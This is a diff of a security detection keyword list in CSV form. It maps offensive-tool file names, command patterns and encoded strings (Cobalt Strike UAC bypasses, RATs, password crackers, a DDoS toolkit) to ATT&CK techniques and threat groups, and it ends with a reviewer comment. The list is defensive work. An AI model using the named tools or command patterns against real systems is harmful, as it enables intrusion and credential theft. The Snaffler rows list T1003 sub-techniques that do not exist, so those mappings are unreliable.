T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*UACTokenManipulationManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*uberfile --lhost* --lport * --target-os * --downloader *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*udmp-parser-main*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" "*UDVC-Server.exe -c * -i 127.0.0.1*","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","242","54","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" -"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. 
on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1920","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" +"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1923","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" "*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" 
@@ -17911,9 +18095,9 @@ "*UlBDIFNlcnZlciBIb3N0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UlBDIFNlcnZlciBQb3J0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Ullaakut/Gorsair*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - 
T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 
- T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - 
T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 
- T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" 
"*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" 
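Review bot: The three Snaffler rows re-added in this hunk keep an ATT&CK mapping that does not match the framework. Two of them enumerate `T1003.001` through `T1003.123`, but T1003 (OS Credential Dumping) only defines sub-techniques .001 to .008, and they pair it with `TA0003 - TA0004` rather than Credential Access. The keyword `*UltraSnaffler.sln*` also appears twice with different descriptions, techniques and categories, so a consumer that keys on the keyword gets an ambiguous mapping. These columns presumably drive alert enrichment and triage, so I would keep one row per keyword and replace the enumerated list with techniques that fit a share and credential hunter, for example `"T1552.001 - T1083 - T1135","TA0006 - TA0007"`, to be confirmed by the maintainers. The star-count refresh itself needs no change.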
@@ -17921,83 +18105,83 @@ "*UmVmbGVjdGl2ZSBETEwgVVJJ*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 